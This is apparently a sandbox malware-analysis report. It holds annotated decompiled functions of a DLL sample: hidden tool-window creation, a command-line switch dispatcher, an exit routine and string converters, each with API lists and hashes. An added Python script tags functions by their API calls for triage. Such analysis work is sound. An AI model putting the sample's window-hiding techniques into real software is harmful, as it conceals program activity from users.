    			E6ECA2D55() {
    				struct HWND__* _t1;
    				int _t3;
    				void* _t7;
    
    				_t1 =  *0x6ecb0398; // 0x0 (initial load omitted by the decompiler; _t1 was used uninitialised)
    				if(_t1 != 0) {
    					_t3 = IsWindow(_t1);
    					_t1 =  *0x6ecb0398; // 0x0
    					if(_t3 != 0) {
    						PostMessageA(_t1, 0x10, 0, 0); // WM_CLOSE
    						_t1 =  *0x6ecb0398; // 0x0
    					}
    				}
    				_t7 = 0;
    				while(_t1 != 0 && IsWindow(_t1) != 0) {
    					Sleep(0x3e8); // 1000 ms
    					_t7 = _t7 + 1;
    					if(_t7 < 0xa) {
    						_t1 =  *0x6ecb0398; // 0x0
    						continue;
    					}
    					break;
    				}
    				ExitProcess(0);
    			}

    APIs
    • IsWindow.USER32 ref: 6ECA2D63
    • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 6ECA2D75
    • IsWindow.USER32 ref: 6ECA2D9A
    • Sleep.KERNEL32(000003E8), ref: 6ECA2DA5
    • ExitProcess.KERNEL32 ref: 6ECA2DAF
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Window$ExitMessagePostProcessSleep
    • String ID:
    • API String ID: 1225241566-0
    • Opcode ID: 11306c0213ff53abd55861bdd59dab88ef31960ddb0e14712086c74cd72d7f93
    • Instruction ID: 9f967016c288655b5df09fd6f419578660ef6ad1fd0947e0e8c988259c62b912
    • Opcode Fuzzy Hash: 11306c0213ff53abd55861bdd59dab88ef31960ddb0e14712086c74cd72d7f93
    • Instruction Fuzzy Hash: 69F01930B40B27A7EA9497EE8EA9F5A36F89B4AB05F010410BA15D7685E560E401CA64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			// Window-creation wrapper. M6ECB05F0 is an unresolved import thunk called with 12 arguments in
    			// CreateWindowExW order (dwExStyle, lpClassName, lpWindowName, dwStyle, x, y, nWidth, nHeight,
    			// hWndParent, hMenu, hInstance, lpParam); _a8 is therefore the class name, not an HWND.
    			E6ECA8100(intOrPtr _a4, struct HWND__* _a8, signed int _a12, signed int _a16, signed int _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
    				short _v568;
    				signed int _t16;
    				struct HWND__* _t20;
    				signed int _t32;
    				intOrPtr _t34;
    				intOrPtr _t36;
    				WCHAR* _t37;
    				int _t40;
    				struct HWND__* _t52;
    
    				_t32 = _a16;
    				// Unless it is a non-popup WS_CHILD (0x40000000) window: strip WS_VISIBLE (0x10000000), drop the
    				// window title and force dwExStyle = WS_EX_NOACTIVATE | WS_EX_TOOLWINDOW (0x8000080), i.e. a
    				// hidden, non-activating tool window
    				if((_t32 & 0x40000000) == 0 || _t32 < 0) {
    					_t16 = 1;
    					_t32 = _t32 & 0xefffffff;
    					_t36 = 0x8000080;
    				} else {
    					_t36 = _a4; // caller-supplied dwExStyle
    					_t16 = 0;
    				}
    				_push(_a48);
    				_push(_a44);
    				_push(_a40);
    				_push(_a36);
    				_push(0);
    				_push(0);
    				_push( ~_a32);
    				asm("sbb eax, eax");
    				_push( ~_a28);
    				_push(_t32);
    				_push( !( ~_t16) & _a12); // lpWindowName, zeroed when _t16 == 1
    				_t20 = _a8;
    				_push(_t20);
    				_push(_t36);
    				M6ECB05F0();
    				_t52 = _t20; // decompiler quirk: this is the thunk's return value, the new HWND
    				_t40 = GetClassNameW(_t52,  &_v568, 0x103);
    				if(_t40 <= 0) {
    					L10:
    					return _t52;
    				} else {
    					_t37 = M6ECB0560; // 0x0, first class-name string (not resolved in this dump)
    					if(lstrcmpiW( &_v568, _t37) != 0) {
    						if(_t40 > 1) {
    							_t34 = M6ECB0558; // 0x0, second string, compared from its second WCHAR on
    							if(lstrcmpiW( &_v568, _t34 + 2) == 0) {
    								// Matching window is remembered in 0x6ecb039c. The two unresolved thunks are called with
    								// ShowWindow(hwnd, 4 = SW_SHOWNOACTIVATE) and SetWindowPos(hwnd, 0, 0, 0, 1, 1,
    								// 0x1a = SWP_NOMOVE | SWP_NOREDRAW | SWP_NOACTIVATE) argument shapes: shown at 1x1 without activation
    								_push(4);
    								_push(_t52);
    								 *0x6ecb039c = _t52;
    								M6ECB05B8();
    								_push(0x1a);
    								_push(1);
    								_push(1);
    								_push(0);
    								_push(0);
    								_push(0);
    								_push(_t52);
    								M6ECB05C4();
    							}
    						}
    						goto L10;
    					} else {
    						DestroyWindow(_t52); // class name matched the first string: window torn down again
    						return 0;
    					}
    				}
    			}

    APIs
    • GetClassNameW.USER32 ref: 6ECA818D
    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 6ECA81AB
    • DestroyWindow.USER32(00000000), ref: 6ECA81B2
    • lstrcmpiW.KERNEL32(-00000002,-00000002), ref: 6ECA81EF
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: lstrcmpi$ClassDestroyNameWindow
    • String ID:
    • API String ID: 2342604607-0
    • Opcode ID: 7bbe1cb65fba7926be6536f82387c1f063d539e6202fe20fd83eb674d8db4616
    • Instruction ID: 4a3af59787786010fae07021443cc4b0e4dd327b5282728ec5a5a68f92147aea
    • Opcode Fuzzy Hash: 7bbe1cb65fba7926be6536f82387c1f063d539e6202fe20fd83eb674d8db4616
    • Instruction Fuzzy Hash: 7131B633255752ABE7209A9CCE49FEF73B8EF89710F140919FB55D3180E674A8048BA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Command-line switch dispatcher. E6ECAA3D0 splits GetCommandLineA() into a LocalAlloc'd argv
    			// (count returned through _v4). Arguments from index 2 on are examined; the first one that is a
    			// single character selects an action, after which argv is freed and the process always exits.
    			E6ECAA230() {
    				int _v4;
    				char _v7;
    				char _v8;
    				char* _t12;
    				intOrPtr* _t15;
    				char _t18;
    				int _t23;
    				signed int _t29;
    				void* _t32;
    
    				_t12 = GetCommandLineA();
    				if(_t12 == 0) {
    					L20:
    					ExitProcess(0);
    				}
    				_v4 = 0;
    				_t32 = E6ECAA3D0(_t12,  &_v4);
    				if(_t32 == 0) {
    					L19:
    					goto L20;
    				}
    				_t23 = _v4;
    				if(_t23 <= 2) {
    					L18:
    					LocalFree(_t32);
    					goto L19;
    				}
    				_t29 = 2;
    				if(_t23 <= 2) {
    					L17:
    					goto L18;
    				}
    				do {
    					_t15 =  *((intOrPtr*)(_t32 + _t29 * 4));
    					if( *((char*)(_t15 + 1)) != 0) {
    						goto L10; // longer than one character: ignored
    					}
    					_v8 =  *_t15;
    					_v7 = 0;
    					CharLowerA( &_v8); // switches are case-insensitive
    					_t18 = _v8;
    					if(_t18 == 0x66) { // 'f'
    						E6ECAA130(1);
    						L15:
    						L16:
    						goto L17;
    					}
    					if(_t18 == 0x65) { // 'e'
    						E6ECAA130(0);
    						goto L15;
    					}
    					if(_t18 == 0x75) { // 'u'
    						E6ECA9BD0(1);
    						goto L15;
    					}
    					_t23 = _v4;
    					L10:
    					_t29 = _t29 + 1;
    				} while (_t29 < _t23);
    				goto L16;
    			}

    APIs
    • GetCommandLineA.KERNEL32 ref: 6ECAA233
    • ExitProcess.KERNEL32 ref: 6ECAA2DF
      • Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
      • Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4
    • CharLowerA.USER32(?,?,?,?,?,?), ref: 6ECAA29A
    • LocalFree.KERNEL32(00000000,?), ref: 6ECAA2D6
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Local$AllocCharCommandExitFreeLineLowerProcesslstrlen
    • String ID:
    • API String ID: 4176052798-0
    • Opcode ID: 6a993545ecdb95567ab309e0afc5c67f71fbb918f40baa940b38d8da146a9427
    • Instruction ID: fe19446dc9ad10276170a9c9f32967175bc7d27654c25404a52d5e0125e48af1
    • Opcode Fuzzy Hash: 6a993545ecdb95567ab309e0afc5c67f71fbb918f40baa940b38d8da146a9427
    • Instruction Fuzzy Hash: 4A11E72004C247AFD3809ADD98547DE7BAB6FC2319F040919F79E82186F7A2945587A3
    Uniqueness

    Uniqueness Score: -1.00%
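    The cookie initialiser E6ECAC13A is pure CRT boilerplate, while E6ECA3A70, E6ECA2340 and E6ECAA230 are functions whose API lists actually say something about the sample. The script below is an added example and is not part of this Joe Sandbox report or of the sample's code: it parses the report's "• Api.MODULE(args), ref: ADDR" bullets per function, drops any function whose direct imports are exactly the five __security_init_cookie calls, and tags the remaining functions by the APIs they use. The sample input is copied from the function blocks on this page; the tag names, the groupings in TAG_ANY/TAG_ALL and the function-header regex are my own assumptions about the report format.

```python
"""Tag the functions of a sandbox decompilation report by their 'APIs' bullets, dropping CRT boilerplate."""
import re
from collections import OrderedDict

# Constructed sample input: 'APIs' bullets of four function blocks copied from this report (header line, 'APIs', bullets).
SAMPLE_REPORT = """\
E6ECAC13A() {
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6ECAC171
• GetCurrentProcessId.KERNEL32 ref: 6ECAC17D
• GetCurrentThreadId.KERNEL32 ref: 6ECAC185
• GetTickCount.KERNEL32 ref: 6ECAC18D
• QueryPerformanceCounter.KERNEL32(?), ref: 6ECAC199
E6ECA3A70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
APIs
• GetProcessHeap.KERNEL32(00000008,00000004), ref: 6ECA3AAA
• HeapAlloc.KERNEL32(00000000), ref: 6ECA3AB1
• CreateThread.KERNEL32 ref: 6ECA3ACB
• CloseHandle.KERNEL32(00000000), ref: 6ECA3AD2
• SetServiceStatus.ADVAPI32(00000000,6ECB043C), ref: 6ECA3B26
E6ECA2340(intOrPtr* _a4) {
APIs
• Sleep.KERNEL32(00000BB8), ref: 6ECA234D
• Sleep.KERNEL32(000007D0), ref: 6ECA236A
• GetFileAttributesA.KERNEL32(00000000), ref: 6ECA2370
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 6ECA238B
• ExitProcess.KERNEL32 ref: 6ECA239A
E6ECAA230() {
APIs
• GetCommandLineA.KERNEL32 ref: 6ECAA233
• ExitProcess.KERNEL32 ref: 6ECAA2DF
  • Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
• CharLowerA.USER32(?,?,?,?,?,?), ref: 6ECAA29A
• LocalFree.KERNEL32(00000000,?), ref: 6ECAA2D6
"""

FUNC_RE = re.compile(r"^(E[0-9A-F]{8})\(")  # function header: E<8 hex digits>( ... (assumed report format)
API_RE = re.compile(r"^•\s+(\w+)\.(\w+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-F]+)$")  # '• Api.MODULE(args), ref: ADDR'
SUBCALL_RE = re.compile(r"^•\s+Part of subcall function ([0-9A-F]+):\s+(\w+)\.(\w+)")  # import made by a callee

# Exactly the five calls the MSVC CRT's __security_init_cookie makes to seed the /GS cookie.
CRT_COOKIE_INIT = frozenset({"GetSystemTimeAsFileTime", "GetCurrentProcessId", "GetCurrentThreadId",
                             "GetTickCount", "QueryPerformanceCounter"})
# TAG_ANY: any listed API earns the tag; TAG_ALL: every listed API must be present. Tag names are my own.
TAG_ANY = OrderedDict([
    ("service-control", {"SetServiceStatus", "RegisterServiceCtrlHandlerExA", "RegisterServiceCtrlHandlerExW",
                         "StartServiceCtrlDispatcherA", "StartServiceCtrlDispatcherW"}),
    ("thread-creation", {"CreateThread", "CreateRemoteThread"}),
    ("process-exit", {"ExitProcess", "TerminateProcess"}),
    ("cmdline-parsing", {"GetCommandLineA", "GetCommandLineW", "CommandLineToArgvW"}),
])
TAG_ALL = OrderedDict([
    ("file-poll-loop", {"Sleep", "GetFileAttributesA"}),  # the wait-until-the-file-is-gone loop of E6ECA2340
])


def parse_report(text):
    """Map function name -> {'apis': [(api, module, ref_addr)], 'subcalls': [(callee, api)]}."""
    funcs = OrderedDict()
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        header = FUNC_RE.match(line)
        if header:
            current = header.group(1)
            funcs[current] = {"apis": [], "subcalls": []}
            continue
        if current is None:
            continue
        sub = SUBCALL_RE.match(line)  # test first: a subcall line also starts with a bullet
        if sub:
            funcs[current]["subcalls"].append((sub.group(1), sub.group(2)))
            continue
        call = API_RE.match(line)
        if call:
            funcs[current]["apis"].append((call.group(1), call.group(2), int(call.group(3), 16)))
    return funcs


def tag_function(apis):
    """Tags for one function from its direct calls; callee imports are deliberately excluded."""
    names = {api for api, _module, _ref in apis}
    if names == CRT_COOKIE_INIT:
        return ["crt:__security_init_cookie"]  # compiler-generated, nothing sample-specific
    tags = [tag for tag, wanted in TAG_ANY.items() if names & wanted]
    tags += [tag for tag, wanted in TAG_ALL.items() if wanted <= names]
    return tags


def triage(text):
    """Parse the report text and attach a 'tags' list to every function found."""
    funcs = parse_report(text)
    for info in funcs.values():
        info["tags"] = tag_function(info["apis"])
    return funcs


if __name__ == "__main__":
    for name, info in triage(SAMPLE_REPORT).items():
        calls = ", ".join(f"{api}@{ref:08X}" for api, _module, ref in info["apis"])
        print(f"{name}: {info['tags'] or ['untagged']}\n    {calls}")
```

    Feed the whole report text in place of SAMPLE_REPORT to run it over every function block. "Part of subcall function" bullets are recorded separately on purpose: imports made by a helper such as 6ECAA3D0 would otherwise inflate the caller's tags, and the crt:__security_init_cookie match only fires when the direct import set is exactly the five seed calls.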

    C-Code - Quality: 90%
    			// UTF-16 -> narrow string helper. The sbb/and idiom the decompiler renders as ~_a8 & 0xfde9 selects
    			// the code page: 0xfde9 (CP_UTF8) when _a8 != 0, otherwise 0 (CP_ACP). The result is HeapAlloc'd with
    			// HEAP_ZERO_MEMORY (8); the length without terminator is stored through _a12 when a pointer is given.
    			E6ECAA2F0(short* _a4, signed int _a8, intOrPtr* _a12) {
    				intOrPtr* _t11;
    				char* _t12;
    				int _t13;
    				int _t17;
    				short* _t18;
    
    				_t18 = _a4;
    				_t12 = 0;
    				asm("sbb esi, esi");
    				_t17 =  ~_a8 & 0x0000fde9; // (_a8 != 0) ? CP_UTF8 : CP_ACP
    				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0); // -1: NUL-terminated input; size incl. NUL
    				if(_t13 > 0) {
    					_t3 = _t13 + 1; // 0x1
    					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
    					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
    					_t11 = _a12;
    					if(_t11 != 0) {
    						 *_t11 = _t13 - 1; // length excluding the terminator
    					}
    				}
    				return _t12; // 0 when the conversion failed
    			}

    APIs
    • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA311
    • GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0), ref: 6ECAA323
    • HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0,0000009C), ref: 6ECAA32A
    • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA33E
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharHeapMultiWide$AllocProcess
    • String ID:
    • API String ID: 1432973188-0
    • Opcode ID: 37054ca9e507f1390ec5f818c3ae98b175fc060b6c5b86b6135426f6ef7f237a
    • Instruction ID: b44ecff268932a32a7cdf9f1c3c30019f990f99e40fe0416346341a89927c484
    • Opcode Fuzzy Hash: 37054ca9e507f1390ec5f818c3ae98b175fc060b6c5b86b6135426f6ef7f237a
    • Instruction Fuzzy Hash: 66F049B62057197FE6004A5D8D84F6B77ACEBC57B9F110225FA25D31C0D660EC054671
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			// Narrow -> UTF-16 counterpart of E6ECAA2F0, same code-page selection (_a8 != 0 ? CP_UTF8 : CP_ACP).
    			// Allocates 2 * len + 2 bytes (one WCHAR per character plus the terminator) from the process heap.
    			E6ECAA360(char* _a4, signed int _a8, intOrPtr* _a12) {
    				intOrPtr* _t12;
    				short* _t13;
    				int _t14;
    				int _t18;
    				char* _t19;
    
    				_t19 = _a4;
    				_t13 = 0;
    				asm("sbb esi, esi");
    				_t18 =  ~_a8 & 0x0000fde9; // (_a8 != 0) ? CP_UTF8 : CP_ACP
    				_t14 = MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, 0, 0); // -1: NUL-terminated input; count incl. NUL
    				if(_t14 > 0) {
    					_t4 = _t14 + 2; // 0x2
    					_t13 = HeapAlloc(GetProcessHeap(), 8, _t14 + _t4); // 2 * _t14 + 2 bytes, zero-initialised
    					MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, _t13, _t14);
    					_t12 = _a12;
    					if(_t12 != 0) {
    						 *_t12 = _t14 - 1; // length in WCHARs excluding the terminator
    					}
    				}
    				return _t13; // 0 when the conversion failed
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,76D26900,6ECA39D7,?,00000000,00000000), ref: 6ECAA37F
    • GetProcessHeap.KERNEL32(00000008,00000002), ref: 6ECAA392
    • HeapAlloc.KERNEL32(00000000), ref: 6ECAA399
    • MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000), ref: 6ECAA3A9
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharHeapMultiWide$AllocProcess
    • String ID:
    • API String ID: 1432973188-0
    • Opcode ID: f2c2abff3a5340a25382658f1201e3642191afe98bab74492e34229e8926ccd0
    • Instruction ID: e95c80edda0b759dc4683c8214f002fc1cb47ab628135198596c28bbdf983da2
    • Opcode Fuzzy Hash: f2c2abff3a5340a25382658f1201e3642191afe98bab74492e34229e8926ccd0
    • Instruction Fuzzy Hash: 77F09CB6201A157FD7004A9D8D84D6BBBADEBC6779F110325FE25D32C0D660EC058A71
    Uniqueness

    Uniqueness Score: -1.00%